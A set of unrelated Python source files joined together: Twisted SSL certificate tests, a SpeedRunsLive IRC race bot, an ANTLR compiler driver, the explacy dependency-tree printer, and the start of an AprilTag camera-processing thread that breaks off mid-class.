    cert.sign(keypair, "md5")
    return keypair, cert
class DataCallbackProtocol(protocol.Protocol):
    """Server-side protocol that fires the factory's onData deferred with
    the first bytes received, and onLost (as an errback) on disconnect.

    Each deferred is popped before firing so it can only ever fire once,
    even if more data arrives or connectionLost is called again.
    """
    def dataReceived(self, data):
        d, self.factory.onData = self.factory.onData, None
        if d is not None:
            d.callback(data)
    def connectionLost(self, reason):
        d, self.factory.onLost = self.factory.onLost, None
        if d is not None:
            d.errback(reason)
class WritingProtocol(protocol.Protocol):
    """Client-side protocol that writes a single marker byte on connect and
    errbacks the factory's onLost deferred when the connection drops."""
    # The payload the loopback tests expect to receive on the server side.
    byte = 'x'
    def connectionMade(self):
        self.transport.write(self.byte)
    def connectionLost(self, reason):
        self.factory.onLost.errback(reason)
class OpenSSLOptions(unittest.TestCase):
    """Tests for sslverify's DistinguishedName/Certificate helpers and for
    real SSL loopback connections built from generated certificates.

    NOTE(review): legacy Python 2 / old Twisted trial code -- setUpClass is
    written as an instance method, assertEquals/failIf are the deprecated
    spellings, and the afterLost callbacks use nested-tuple parameter
    unpacking, which is Python-2-only syntax.  Left byte-identical here.
    """
    # Connection state created by loopback(); cleaned up in tearDown().
    serverPort = clientConn = None
    onServerLost = onClientLost = None
    def setUpClass(self):
        # One server and one client certificate shared by every test.
        self.sKey, self.sCert = makeCertificate(
            O="Server Test Certificate",
            CN="server")
        self.cKey, self.cCert = makeCertificate(
            O="Client Test Certificate",
            CN="client")
    def tearDown(self):
        # Stop listening / disconnect, then wait on both connection-lost
        # deferreds (if set) so the reactor is clean for the next test.
        if self.serverPort is not None:
            self.serverPort.stopListening()
        if self.clientConn is not None:
            self.clientConn.disconnect()
        L = []
        if self.onServerLost is not None:
            L.append(self.onServerLost)
        if self.onClientLost is not None:
            L.append(self.onClientLost)
        return defer.DeferredList(L, consumeErrors=True)
    def loopback(self, serverCertOpts, clientCertOpts,
                 onServerLost=None, onClientLost=None, onData=None):
        # Start an SSL server on an ephemeral port and connect an SSL client
        # to it.  Deferreds created here are also stored on self so tearDown
        # waits on them; caller-supplied deferreds are used as-is (and are
        # then the caller's responsibility to wait on).
        if onServerLost is None:
            self.onServerLost = onServerLost = defer.Deferred()
        if onClientLost is None:
            self.onClientLost = onClientLost = defer.Deferred()
        if onData is None:
            onData = defer.Deferred()
        serverFactory = protocol.ServerFactory()
        serverFactory.protocol = DataCallbackProtocol
        serverFactory.onLost = onServerLost
        serverFactory.onData = onData
        clientFactory = protocol.ClientFactory()
        clientFactory.protocol = WritingProtocol
        clientFactory.onLost = onClientLost
        # Port 0: let the OS pick a free port, then connect to it.
        self.serverPort = reactor.listenSSL(0, serverFactory, serverCertOpts)
        self.clientConn = reactor.connectSSL('127.0.0.1', self.serverPort.getHost().port,
                                             clientFactory, clientCertOpts)
    def testAbbreviatingDistinguishedNames(self):
        # DN is an alias for DistinguishedName; the abbreviated keyword
        # spellings (CN, OU, ...) must compare equal to the long forms.
        self.assertEquals(sslverify.DN(CN='a', OU='hello'),
                          sslverify.DistinguishedName(commonName='a', organizationalUnitName='hello'))
        self.assertNotEquals(sslverify.DN(CN='a', OU='hello'),
                             sslverify.DN(CN='a', OU='hello', emailAddress='xxx'))
        dn = sslverify.DN(CN='abcdefg')
        # Unknown attribute spellings must be rejected ...
        self.assertRaises(AttributeError, setattr, dn, 'Cn', 'x')
        # ... while short and long spellings stay in sync on assignment.
        self.assertEquals(dn.CN, dn.commonName)
        dn.CN = 'bcdefga'
        self.assertEquals(dn.CN, dn.commonName)
    def testInspectDistinguishedName(self):
        # inspect() output must mention every populated field, title-cased.
        n = sslverify.DN(commonName='common name',
                         organizationName='organization name',
                         organizationalUnitName='organizational unit name',
                         localityName='locality name',
                         stateOrProvinceName='state or province name',
                         countryName='country name',
                         emailAddress='email address')
        s = n.inspect()
        for k in [
            'common name',
            'organization name',
            'organizational unit name',
            'locality name',
            'state or province name',
            'country name',
            'email address']:
            self.assertIn(k, s, "%r was not in inspect output." % (k,))
            self.assertIn(k.title(), s, "%r was not in inspect output." % (k,))
    def testInspectDistinguishedNameWithoutAllFields(self):
        # Unpopulated fields must be omitted entirely from inspect() output.
        n = sslverify.DN(localityName='locality name')
        s = n.inspect()
        for k in [
            'common name',
            'organization name',
            'organizational unit name',
            'state or province name',
            'country name',
            'email address']:
            self.assertNotIn(k, s, "%r was in inspect output." % (k,))
            self.assertNotIn(k.title(), s, "%r was in inspect output." % (k,))
        self.assertIn('locality name', s)
        self.assertIn('Locality Name', s)
    def test_inspectCertificate(self):
        """
        Test that the C{inspect} method of L{sslverify.Certificate} returns
        a human-readable string containing some basic information about the
        certificate.
        """
        # NOTE(review): expected values are pinned to A_HOST_CERTIFICATE_PEM;
        # the "<EMAIL>"/"<KEY>" redactions in this file must be restored for
        # this test to pass.
        c = sslverify.Certificate.loadPEM(A_HOST_CERTIFICATE_PEM)
        self.assertEqual(
            c.inspect().split('\n'),
            ["Certificate For Subject:",
             "  Organizational Unit Name: Security",
             "         Organization Name: Twisted Matrix Labs",
             "               Common Name: example.twistedmatrix.com",
             "    State Or Province Name: Massachusetts",
             "              Country Name: US",
             "             Email Address: <EMAIL>",
             "             Locality Name: Boston",
             "",
             "Issuer:",
             "  Organizational Unit Name: Security",
             "         Organization Name: Twisted Matrix Labs",
             "               Common Name: example.twistedmatrix.com",
             "    State Or Province Name: Massachusetts",
             "              Country Name: US",
             "             Email Address: <EMAIL>",
             "             Locality Name: Boston",
             "",
             "Serial Number: 12345",
             "Digest: C4:96:11:00:30:C3:EC:EE:A3:55:AA:ED:8C:84:85:18",
             "Public Key with Hash: ff33994c80812aa95a79cdb85362d054"])
    def test_certificateOptionsSerialization(self):
        """
        Test that __setstate__(__getstate__()) round-trips properly.
        """
        firstOpts = sslverify.OpenSSLCertificateOptions(
            privateKey=self.sKey,
            certificate=self.sCert,
            method=SSL.SSLv3_METHOD,
            verify=True,
            caCerts=[self.sCert],
            verifyDepth=2,
            requireCertificate=False,
            verifyOnce=False,
            enableSingleUseKeys=False,
            enableSessions=False,
            fixBrokenPeers=True)
        context = firstOpts.getContext()
        state = firstOpts.__getstate__()
        # The context shouldn't be in the state to serialize
        self.failIf(objgrep(state, context, isSame), objgrep(state, context, isSame))
        opts = sslverify.OpenSSLCertificateOptions()
        opts.__setstate__(state)
        # Every configured option must survive the round-trip unchanged.
        self.assertEqual(opts.privateKey, self.sKey)
        self.assertEqual(opts.certificate, self.sCert)
        self.assertEqual(opts.method, SSL.SSLv3_METHOD)
        self.assertEqual(opts.verify, True)
        self.assertEqual(opts.caCerts, [self.sCert])
        self.assertEqual(opts.verifyDepth, 2)
        self.assertEqual(opts.requireCertificate, False)
        self.assertEqual(opts.verifyOnce, False)
        self.assertEqual(opts.enableSingleUseKeys, False)
        self.assertEqual(opts.enableSessions, False)
        self.assertEqual(opts.fixBrokenPeers, True)
    def testAllowedAnonymousClientConnection(self):
        # Server does not require a client certificate: the anonymous
        # client's single byte must arrive intact.
        onData = defer.Deferred()
        self.loopback(sslverify.OpenSSLCertificateOptions(privateKey=self.sKey, certificate=self.sCert, requireCertificate=False),
                      sslverify.OpenSSLCertificateOptions(requireCertificate=False),
                      onData=onData)
        return onData.addCallback(
            lambda result: self.assertEquals(result, WritingProtocol.byte))
    def testRefusedAnonymousClientConnection(self):
        # Server requires a client certificate; the anonymous client must be
        # rejected, so both sides lose the connection with a failure.
        onServerLost = defer.Deferred()
        onClientLost = defer.Deferred()
        self.loopback(sslverify.OpenSSLCertificateOptions(privateKey=self.sKey, certificate=self.sCert, verify=True, caCerts=[self.sCert], requireCertificate=True),
                      sslverify.OpenSSLCertificateOptions(requireCertificate=False),
                      onServerLost=onServerLost,
                      onClientLost=onClientLost)
        d = defer.DeferredList([onClientLost, onServerLost], consumeErrors=True)
        # Python-2-only nested-tuple parameter unpacking.
        def afterLost(((cSuccess, cResult), (sSuccess, sResult))):
            self.failIf(cSuccess)
            self.failIf(sSuccess)
            # XXX Twisted doesn't report SSL errors as SSL errors, but in the
            # future it will.
            # cResult.trap(SSL.Error)
            # sResult.trap(SSL.Error)
            # Twisted trunk will do the correct thing here, and not log any
            # errors.  Twisted 2.1 will do the wrong thing.  We're flushing
            # errors until the buildbot is updated to a reasonable facsimile
            # of 2.2.
            log.flushErrors(SSL.Error)
        return d.addCallback(afterLost)
    def testFailedCertificateVerification(self):
        # Client verifies against the *client* CA, which did not sign the
        # server's certificate: the handshake must fail on both sides.
        onServerLost = defer.Deferred()
        onClientLost = defer.Deferred()
        self.loopback(sslverify.OpenSSLCertificateOptions(privateKey=self.sKey, certificate=self.sCert, verify=False, requireCertificate=False),
                      sslverify.OpenSSLCertificateOptions(verify=True, requireCertificate=False, caCerts=[self.cCert]),
                      onServerLost=onServerLost,
                      onClientLost=onClientLost)
        d = defer.DeferredList([onClientLost, onServerLost], consumeErrors=True)
        def afterLost(((cSuccess, cResult), (sSuccess, sResult))):
            self.failIf(cSuccess)
            self.failIf(sSuccess)
            # Twisted trunk will do the correct thing here, and not log any
            # errors.  Twisted 2.1 will do the wrong thing.  We're flushing
            # errors until the buildbot is updated to a reasonable facsimile
            # of 2.2.
            log.flushErrors(SSL.Error)
        return d.addCallback(afterLost)
    def testSuccessfulCertificateVerification(self):
        # Client verifies the server against the CA that actually signed the
        # server certificate: the data byte must arrive.
        onData = defer.Deferred()
        self.loopback(sslverify.OpenSSLCertificateOptions(privateKey=self.sKey, certificate=self.sCert, verify=False, requireCertificate=False),
                      sslverify.OpenSSLCertificateOptions(verify=True, requireCertificate=True, caCerts=[self.sCert]),
                      onData=onData)
        return onData.addCallback(lambda result: self.assertEquals(result, WritingProtocol.byte))
    def testSuccessfulSymmetricSelfSignedCertificateVerification(self):
        # Mutual verification: each side presents its own self-signed
        # certificate and trusts the other's.
        onData = defer.Deferred()
        self.loopback(sslverify.OpenSSLCertificateOptions(privateKey=self.sKey, certificate=self.sCert, verify=True, requireCertificate=True, caCerts=[self.cCert]),
                      sslverify.OpenSSLCertificateOptions(privateKey=self.cKey, certificate=self.cCert, verify=True, requireCertificate=True, caCerts=[self.sKey]),
                      onData=onData)
        return onData.addCallback(lambda result: self.assertEquals(result, WritingProtocol.byte))
    def testVerification(self):
        # Build a tiny two-party PKI with the high-level KeyPair API:
        # each side self-signs a CA certificate and cross-signs the other's
        # leaf certificate, then a verified loopback connection is made.
        clientDN = sslverify.DistinguishedName(commonName='client')
        clientKey = sslverify.KeyPair.generate()
        clientCertReq = clientKey.certificateRequest(clientDN)
        serverDN = sslverify.DistinguishedName(commonName='server')
        serverKey = sslverify.KeyPair.generate()
        serverCertReq = serverKey.certificateRequest(serverDN)
        ##
        clientSelfCertReq = clientKey.certificateRequest(clientDN)
        clientSelfCertData = clientKey.signCertificateRequest(clientDN, clientSelfCertReq,
                                                              lambda dn: True,
                                                              132)
        clientSelfCert = clientKey.newCertificate(clientSelfCertData)
        ##
        ##
        serverSelfCertReq = serverKey.certificateRequest(serverDN)
        serverSelfCertData = serverKey.signCertificateRequest(serverDN, serverSelfCertReq,
                                                              lambda dn: True,
                                                              516)
        serverSelfCert = serverKey.newCertificate(serverSelfCertData)
        ##
        ##
        clientCertData = serverKey.signCertificateRequest(serverDN, clientCertReq,
                                                          lambda dn: True,
                                                          7)
        clientCert = clientKey.newCertificate(clientCertData)
        ##
        ##
        serverCertData = clientKey.signCertificateRequest(clientDN, serverCertReq,
                                                          lambda dn: True,
                                                          42)
        serverCert = serverKey.newCertificate(serverCertData)
        ##
        onData = defer.Deferred()
        serverOpts = serverCert.options(serverSelfCert)
        clientOpts = clientCert.options(clientSelfCert)
        self.loopback(serverOpts,
                      clientOpts,
                      onData=onData)
        return onData.addCallback(lambda result: self.assertEquals(result, WritingProtocol.byte))
class _NotSSLTransport:
    """Fake transport whose handle is not an SSL connection object at all
    (no get_peer_certificate / get_host_certificate methods)."""
    def getHandle(self):
        return self
class _MaybeSSLTransport:
    """Fake SSL transport whose handle has the certificate accessors but no
    certificates -- i.e. a TLS connection with no peer/host certificate."""
    def getHandle(self):
        return self
    def get_peer_certificate(self):
        return None
    def get_host_certificate(self):
        return None
class _ActualSSLTransport:
    """Fake SSL transport that serves the static fixture certificates as its
    host and peer certificates (as pyOpenSSL X509 objects)."""
    def getHandle(self):
        return self
    def get_host_certificate(self):
        return sslverify.Certificate.loadPEM(A_HOST_CERTIFICATE_PEM).original
    def get_peer_certificate(self):
        return sslverify.Certificate.loadPEM(A_PEER_CERTIFICATE_PEM).original
class Constructors(unittest.TestCase):
    """Tests for the Certificate.peerFromTransport / hostFromTransport
    alternate constructors, using the fake transports defined above.

    NOTE(review): serial-number expectations (12345 / 12346) are pinned to
    the PEM fixtures, whose bodies are partially redacted in this copy.
    """
    def test_peerFromNonSSLTransport(self):
        """
        Verify that peerFromTransport raises an exception if the transport
        passed is not actually an SSL transport.
        """
        x = self.assertRaises(CertificateError,
                              sslverify.Certificate.peerFromTransport,
                              _NotSSLTransport())
        self.failUnless(str(x).startswith("non-TLS"))
    def test_peerFromBlankSSLTransport(self):
        """
        Verify that peerFromTransport raises an exception if the transport
        passed is an SSL transport, but doesn't have a peer certificate.
        """
        x = self.assertRaises(CertificateError,
                              sslverify.Certificate.peerFromTransport,
                              _MaybeSSLTransport())
        self.failUnless(str(x).startswith("TLS"))
    def test_hostFromNonSSLTransport(self):
        """
        Verify that hostFromTransport raises an exception if the transport
        passed is not actually an SSL transport.
        """
        x = self.assertRaises(CertificateError,
                              sslverify.Certificate.hostFromTransport,
                              _NotSSLTransport())
        self.failUnless(str(x).startswith("non-TLS"))
    def test_hostFromBlankSSLTransport(self):
        """
        Verify that hostFromTransport raises an exception if the transport
        passed is an SSL transport, but doesn't have a host certificate.
        """
        x = self.assertRaises(CertificateError,
                              sslverify.Certificate.hostFromTransport,
                              _MaybeSSLTransport())
        self.failUnless(str(x).startswith("TLS"))
    def test_hostFromSSLTransport(self):
        """
        Verify that hostFromTransport successfully creates the correct certificate
        if passed a valid SSL transport.
        """
        self.assertEqual(
            sslverify.Certificate.hostFromTransport(
                _ActualSSLTransport()).serialNumber(),
            12345)
    def test_peerFromSSLTransport(self):
        """
        Verify that peerFromTransport successfully creates the correct certificate
        if passed a valid SSL transport.
        """
        self.assertEqual(
            sslverify.Certificate.peerFromTransport(
                _ActualSSLTransport()).serialNumber(),
            12346)
|
<reponame>floresmatthew/sahasrahbot<gh_stars>0
import asyncio
import datetime
import aiofiles
import logging
import pydle
from alttprbot.database import srl_races
from alttprbot.exceptions import SahasrahBotException
from alttprbot.util.srl import get_all_races, get_race
from alttprbot_srl import commands, racebot
from config import Config as c
class SrlBot(pydle.Client):
    """IRC client for SpeedRunsLive (SRL).

    Identifies with NickServ on connect, joins the standing channels plus
    any active race channels, dispatches incoming messages to the racebot
    and user-command handlers, and logs all IRC traffic per channel.
    """
    async def on_connect(self):
        # Authenticate first; race-channel joins happen only after NickServ
        # confirms recognition (see on_notice).
        await self.message('NickServ', 'identify ' + c.SRL_PASSWORD)
        await self.join('#speedrunslive')
        await self.join('#alttpr')
        if c.DEBUG:
            await self.join('#srl-synack-testing')
    # target = channel of the message
    # source = sendering of the message
    # message = the message, duh
    async def on_message(self, target, source, message):
        """Log the message, then run the racebot and command handlers."""
        try:
            await message_logger("MSG", target, source, message)
            # filter messages sent by the bot (we do not want to react to these)
            if source == c.SRL_NICK:
                return
            # handle messages from racebot
            await racebot.handler(target=target, source=source, message=message, client=self)
            # handle user commands
            await commands.handler(target=target, source=source, message=message, client=self)
        except Exception as err:
            # Report the failure in-channel; deliberate SahasrahBotException
            # errors stop here, anything else is re-raised for logging.
            await self.message(target, f'{type(err)}: "{str(err)}". Please contact Synack if this condition persists.')
            if not isinstance(err, SahasrahBotException):
                raise
    # target = you
    # source = sendering of the message
    # message = the message, duh
    async def on_notice(self, target, source, message):
        """On NickServ recognition, join and re-sync active race channels."""
        await message_logger("NOTICE", target, source, message)
        # do stuff that we want after getting recognized by NickServ
        if message == 'Password accepted - you are now recognized.':
            await asyncio.sleep(1)
            # await self.join('#speedrunslive')
            # await self.join('#alttpr')
            await self.join_active_races(['supermetroidhacks', 'supermetroid'])
            await self.process_active_races()
            # if c.DEBUG: await self.join('#srl-synack-testing')
    async def on_join(self, channel, user):
        await message_logger("JOIN", channel, user, "Joined channel.")
    async def on_part(self, channel, user, message):
        await message_logger("PART", channel, user, message)
    async def on_kick(self, channel, target, by, reason=None):
        await message_logger("KICK", channel, target, f"Kicked by {by} for reason {reason}")
    async def on_kill(self, target, by, reason):
        await message_logger("KILL", target, by, f"Killed for reason {reason}")
    async def on_mode_change(self, channel, modes, by):
        await message_logger("MODE", channel, by, f'Gave {modes[0]} to {modes[1]}')
    async def on_topic_change(self, channel, message, by):
        await message_logger("TOPIC", channel, by, message)
        await racebot.topic_change_handler(channel, by, message, client=self)
    async def join_active_races(self, games):
        """Join the IRC channel of every active SRL race whose game
        abbreviation is listed in `games` (no-op dry run in DEBUG)."""
        races = await get_all_races()
        for race in races['races']:
            if race['game']['abbrev'] in games:
                race_id = race['id']
                if not self.in_channel(f'#srl-{race_id}'):
                    if c.DEBUG:
                        logging.info(f'would have joined #srl-{race_id}')
                    else:
                        await self.join(f'#srl-{race_id}')
    async def process_active_races(self):
        """Re-sync database-tracked races with SRL: forget races that no
        longer exist, and set the goal in races that have left state 1.

        NOTE(review): state 1 appears to mean "entry open" -- confirm
        against the SRL API before relying on this.
        """
        logging.info('process active races running')
        active_races = await srl_races.get_srl_races()
        for active_race in active_races:
            race = await get_race(active_race['srl_id'])
            channel_name = f"#srl-{active_race['srl_id']}"
            if not race:
                await srl_races.delete_srl_race(active_race['srl_id'])
            elif not race['state'] == 1:
                if not self.in_channel(channel_name):
                    await self.join(channel_name)
                await self.message(channel_name, f".setgoal {active_race['goal']}")
                await srl_races.delete_srl_race(active_race['srl_id'])
async def message_logger(msgtype, target, source, message):
    """Append one IRC event to the appropriate per-channel log file.

    The bot's SRL password is redacted from the message before anything
    is written to disk.
    """
    # Redact the password; non-string payloads (no .replace) pass through.
    try:
        message = message.replace(c.SRL_PASSWORD, '**********')
    except AttributeError:
        pass
    # Direct messages (target == our own nick) are filed under the sender's
    # name; channel traffic is filed under the channel name.
    log_name = source if target == c.SRL_NICK else target
    fileloc = f'/var/log/sahasrahbot/srl/{log_name}.txt'
    line = f'{datetime.datetime.now()} - {msgtype} - {target} - {source} - "{message}"\n'
    async with aiofiles.open(fileloc, mode='a+') as logfile:
        await logfile.write(line)
srlbot = SrlBot(c.SRL_NICK, realname=c.SRL_NICK)
|
import logging
import os
import sys
from antlr4 import *
from antlr4.error.ErrorListener import ErrorListener
from antlr4.tree.Trees import Trees
from FirstPassTwoDimParserListener import FirstPassTwoDimParserListener
from SecondPassTwoDimParserListener import SecondPassTwoDimParserListener
from TwoDimLexer import TwoDimLexer
from TwoDimParser import TwoDimParser
class SyntaxErrorListener(ErrorListener):
    """ANTLR parser error listener that converts syntax errors into Python
    SyntaxError exceptions carrying user-oriented hints."""
    def __init__(self):
        super(SyntaxErrorListener, self).__init__()
    def syntaxError(self, recognizer, offending_symbol, line, column, msg, e):
        # Special-case errors immediately after a relational keyword
        # (RIGHT/LEFT/TOP/BOT/IN), possibly separated by one space token.
        # NOTE(review): assumes `e` is not None and exposes the token stream
        # as e.input, and that tokenIndex >= 1 -- a recovered/None exception
        # or an error on the very first token would fail here; confirm with
        # the ANTLR runtime in use.
        if e.input.tokens[offending_symbol.tokenIndex - 1].text.upper() in ["RIGHT", "LEFT", "TOP", "BOT","IN"] \
                or (
                e.input.tokens[offending_symbol.tokenIndex - 1].text.upper() == " " and e.input.tokens[
                    offending_symbol.tokenIndex - 2].text.upper() in ["RIGHT", "LEFT", "TOP", "BOT", "IN"]):
            raise SyntaxError(
                f"Syntax error in relational operation at line {line} column {column}. Check the operation declaration.")
        raise SyntaxError(f"Symbol \"{offending_symbol.text}\" at line {line} column {column} not recognized. \n"
                          f"Tip: If \"{offending_symbol.text}\" is what you meant here, check if preceding symbols"
                          f" are also correct and conforms with syntax. Also check if there is a semicolon in "
                          f"the preceding line.")
class LexerErrorListener(ErrorListener):
    """ANTLR lexer error listener that reconstructs the whole offending
    lexeme (up to the next delimiter) before raising a SyntaxError."""
    def __init__(self):
        super(LexerErrorListener, self).__init__()
    def syntaxError(self, recognizer, offending_token, line, column, msg, e):
        # NOTE(review): assumes `e` carries the character stream at e.input
        # with `strdata`, `index` and `startIndex` attributes; a None `e`
        # would raise AttributeError here.
        endIndex = e.input.index
        # Find the nearest delimiter after the error position; everything up
        # to it is treated as the failed lexeme.
        offset = len(str(e.input.strdata)) - e.input.index
        for c in [' ', ';', '(', ')', '[', ']', '{', '}', '<', '>', ',']:
            if str(e.input.strdata)[e.input.index:].find(c) >= 0 and str(e.input.strdata)[e.input.index:].find(
                    c) < offset:
                offset = str(e.input.strdata)[e.input.index:].find(c)
        endIndex += offset
        # Rebinds the parameter: from here on `offending_token` is the
        # reconstructed source substring, not the token object.
        offending_token = str(e.input.strdata)[e.startIndex:endIndex]
        raise SyntaxError(
            f"Syntax Error (Incorrect lexeme): failed to parse token \"{offending_token}\" at line {line} column {column}."
            f"Check if it fits in syntax rules, is typed correctly and the register used is appropriate.")
def main(argv):
    """Compile the TwoDim source file named on the command line.

    argv[1] -- path to the source file (required).
    argv[2] -- output SVG path (optional; defaults to
               ./generated_images/output.svg).

    Errors are reported via logging rather than raised to the caller.
    """
    try:
        input_stream = FileStream(argv[1])
        lexer = TwoDimLexer(input_stream)
        # Replace ANTLR's default console listeners so lexer/parser errors
        # surface as SyntaxError with the friendlier messages defined above.
        lexer.removeErrorListeners()
        lexer.addErrorListener(LexerErrorListener())
        stream = CommonTokenStream(lexer)
        parser = TwoDimParser(stream)
        parser.removeErrorListeners()
        parser.addErrorListener(SyntaxErrorListener())
        # Start rule
        tree = parser.sourceFile()
        # Show what the parser sees, both in the log and on stdout.
        logging.info(Trees.toStringTree(tree, ruleNames=parser.ruleNames))
        print(Trees.toStringTree(tree, ruleNames=parser.ruleNames))
        # First pass: walk the tree to collect the global context.
        printer = FirstPassTwoDimParserListener()
        walker = ParseTreeWalker()
        walker.walk(printer, tree)
        global_context = printer.context
        # Second pass: generate the output image.  Folding the output-path
        # choice into one variable removes the duplicated constructor call.
        output_path = argv[2] if len(argv) >= 3 else './generated_images/output.svg'
        printer = SecondPassTwoDimParserListener(global_context=global_context,
                                                 parser=parser,
                                                 output_path=output_path)
        walker = ParseTreeWalker()
        walker.walk(printer, tree)
    except IndexError as e:
        logging.error(e)
        if len(argv) < 2:
            logging.error("Not all necessary arguments have been provided.")
    except FileNotFoundError as e:
        logging.error(e)
    except Exception as e:
        message = f"File {'' if len(argv) < 2 else os.path.abspath(argv[1])}\n{e}"
        # logging.exception also records the traceback, which the previous
        # logging.error call dropped; the unused `exception_type` local is
        # gone as well.
        logging.exception(message)
if __name__ == '__main__':
    # argv[0] is the script name; main() expects the source path in argv[1].
    main(sys.argv)
|
<reponame>blotspot/expanse-book-analysis<gh_stars>0
# -*- coding: utf-8 -*-
#
# Box-drawing characters are the thin variants, and can be found here:
# https://en.wikipedia.org/wiki/Box-drawing_character
#
""" explacy.py
This module uses unicode box-drawing characters to draw the spacy-derived
dependency tree of whichever (unicode) string you provide as input.
Usage:
import explacy
import spacy
nlp = spacy.load('en')
explacy.print_parse_info(nlp, 'The salad was surprisingly tasty.')
# Use a unicode string as input (eg u'The dog jumped.') in Python 2.
Example tree rendering:
Dep tree Token Dep type Lemma Part of Sp
──────── ──────────── ──────── ──────────── ──────────
┌─► The det the DET
┌─►└── salad nsubj salad NOUN
┌┼───── was ROOT be VERB
││ ┌─► surprisingly advmod surprisingly ADV
│└─►└── tasty acomp tasty ADJ
└─────► . punct . PUNCT
"""
import sys
from collections import defaultdict
from pprint import pprint
_do_print_debug_info = False
def _print_table(rows):
col_widths = [max(len(s) for s in col) for col in zip(*rows)]
fmt = ' '.join('%%-%ds' % width for width in col_widths)
rows.insert(1, ['─' * width for width in col_widths])
for row in rows:
# Uncomment this version to see code points printed out (for debugging).
# print(list(map(hex, map(ord, list(fmt % tuple(row))))))
print(fmt % tuple(row))
def _start_end(arrow):
start, end = arrow['from'].i, arrow['to'].i
mn = min(start, end)
mx = max(start, end)
return start, end, mn, mx
def print_parse_info(nlp, sent):
    """ Print the dependency tree of `sent` (sentence), along with the lemmas
    (de-inflected forms) and parts-of-speech of the words.
    The input `sent` is expected to be a unicode string (of type unicode in
    Python 2; of type str in Python 3). The input `nlp` (for natural
    language parser) is expected to be the return value from a call to
    spacy.load(), in other words, it's the callable instance of a spacy
    language model.
    """
    unicode_type = str
    assert type(sent) is unicode_type
    # Parse our sentence.
    doc = nlp(sent)
    # Build the arrows.
    # Set the from and to tokens for each arrow.  (An unused `heights` list
    # previously built here was dead code and has been removed.)
    arrows = [{'from': src, 'to': dst, 'underset': set()}
              for src in doc
              for dst in src.children]
    # Set the base height; these may increase to allow room for arrowheads after this.
    arrows_with_deps = defaultdict(set)
    for i, arrow in enumerate(arrows):
        if _do_print_debug_info:
            print('Arrow %d: "%s" -> "%s"' % (i, arrow['from'], arrow['to']))
        num_deps = 0
        start, end, mn, mx = _start_end(arrow)
        # Count the arrows that must be drawn underneath this one; they
        # determine how tall this arrow has to be.
        for j, other in enumerate(arrows):
            if arrow is other:
                continue
            o_start, o_end, o_mn, o_mx = _start_end(other)
            if ((start == o_start and mn <= o_end <= mx) or
                    (start != o_start and mn <= o_start <= mx)):
                num_deps += 1
                if _do_print_debug_info:
                    print('%d is over %d' % (i, j))
                arrow['underset'].add(j)
        arrow['num_deps_left'] = arrow['num_deps'] = num_deps
        arrows_with_deps[num_deps].add(i)
    if _do_print_debug_info:
        print('')
        print('arrows:')
        pprint(arrows)
        print('')
        print('arrows_with_deps:')
        pprint(arrows_with_deps)
    # Render the arrows in characters. Some heights will be raised to make room for arrowheads.
    # Each entry of `lines` is a per-token column, built innermost-first;
    # cells are sets of compass directions later mapped to box characters.
    lines = [[] for token in doc]
    num_arrows_left = len(arrows)
    while num_arrows_left > 0:
        # Always render an arrow with no unrendered arrows beneath it.
        assert len(arrows_with_deps[0])
        arrow_index = arrows_with_deps[0].pop()
        arrow = arrows[arrow_index]
        src, dst, mn, mx = _start_end(arrow)
        # Check the height needed.
        height = 3
        if arrow['underset']:
            height = max(arrows[i]['height'] for i in arrow['underset']) + 1
        height = max(height, 3, len(lines[dst]) + 3)
        arrow['height'] = height
        if _do_print_debug_info:
            print('')
            print('Rendering arrow %d: "%s" -> "%s"' % (arrow_index,
                                                        arrow['from'],
                                                        arrow['to']))
            print('  height = %d' % height)
        goes_up = src > dst
        # Draw the outgoing src line.
        if lines[src] and len(lines[src]) < height:
            lines[src][-1].add('w')
        while len(lines[src]) < height - 1:
            lines[src].append(set(['e', 'w']))
        if len(lines[src]) < height:
            lines[src].append({'e'})
        lines[src][height - 1].add('n' if goes_up else 's')
        # Draw the incoming dst line.
        lines[dst].append(u'►')
        while len(lines[dst]) < height:
            lines[dst].append({'e', 'w'})
        lines[dst][-1] = set(['e', 's']) if goes_up else set(['e', 'n'])
        # Draw the adjoining vertical line.
        for i in range(mn + 1, mx):
            while len(lines[i]) < height - 1:
                lines[i].append(' ')
            lines[i].append(set(['n', 's']))
        # Update arrows_with_deps.
        for arr_i, arr in enumerate(arrows):
            if arrow_index in arr['underset']:
                arrows_with_deps[arr['num_deps_left']].remove(arr_i)
                arr['num_deps_left'] -= 1
                arrows_with_deps[arr['num_deps_left']].add(arr_i)
        num_arrows_left -= 1
    # Compass-direction sets (sorted, joined) -> box-drawing characters.
    arr_chars = {'ew': u'─',
                 'ns': u'│',
                 'en': u'└',
                 'es': u'┌',
                 'ens': u'├',
                 'enw': u'┴',
                 'ensw': u'┼',
                 'esw': u'┬'}
    # Convert the character lists into strings.
    max_len = max(len(line) for line in lines)
    for i in range(len(lines)):
        lines[i] = [arr_chars[''.join(sorted(ch))] if type(ch) is set else ch
                    for ch in lines[i]]
        # Cells were built innermost-first; reverse so the tree reads
        # left-to-right, then left-pad to align the token column.
        lines[i] = ''.join(reversed(lines[i]))
        lines[i] = ' ' * (max_len - len(lines[i])) + lines[i]
    # Compile full table to print out.
    rows = [['Dep tree', 'Token', 'Dep type', 'Lemma', 'Part of Sp']]
    for i, token in enumerate(doc):
        rows.append([lines[i], token, token.dep_, token.lemma_, token.pos_])
    _print_table(rows)
|
import time
import picamera
import apriltag
import cv2
import numpy as np
import math
import threading
from parameters import Parameters
# Create a pool of image processors
# Shared state for the image-processor pool: `done` signals shutdown to the
# capture generator, `lock` guards `pool`, and `pool` holds idle
# ImageProcessor worker threads awaiting a frame.
done = False
lock = threading.Lock()
pool = []
np.set_printoptions(suppress=True)
##########################################################################
class ImageProcessor(threading.Thread):
    """Worker thread that detects AprilTags in a camera frame and pushes the
    resulting pose into a shared Parameters structure.

    Protocol: the capture loop fills `self.img` and sets `self.event`; when
    the worker finishes it resets its buffer and re-inserts itself into the
    global `pool` (guarded by the global `lock`).
    """
    def __init__(self, width, height, parameters):
        super(ImageProcessor, self).__init__()
        self.height = height
        self.width = width
        self.detector = apriltag.Detector()
        # Physical tag edge length; sets the unit of the reported
        # translation.  NOTE(review): units (inches?) not stated here --
        # confirm against the consumer of Parameters.
        self.tag_size = 3.0
        self.parameters = (0,0,0,0) #x,y,z,r
        self.paramstruct = parameters;
        # self.paramstruct = Parameters();
        # Field-of-view angles (radians) used to derive pinhole focal
        # lengths; 62.2 x 48.8 degrees matches the Pi camera v2 datasheet.
        fov_x = 62.2*math.pi/180
        fov_y = 48.8*math.pi/180
        fx = self.width/(2*math.tan(fov_x/2))
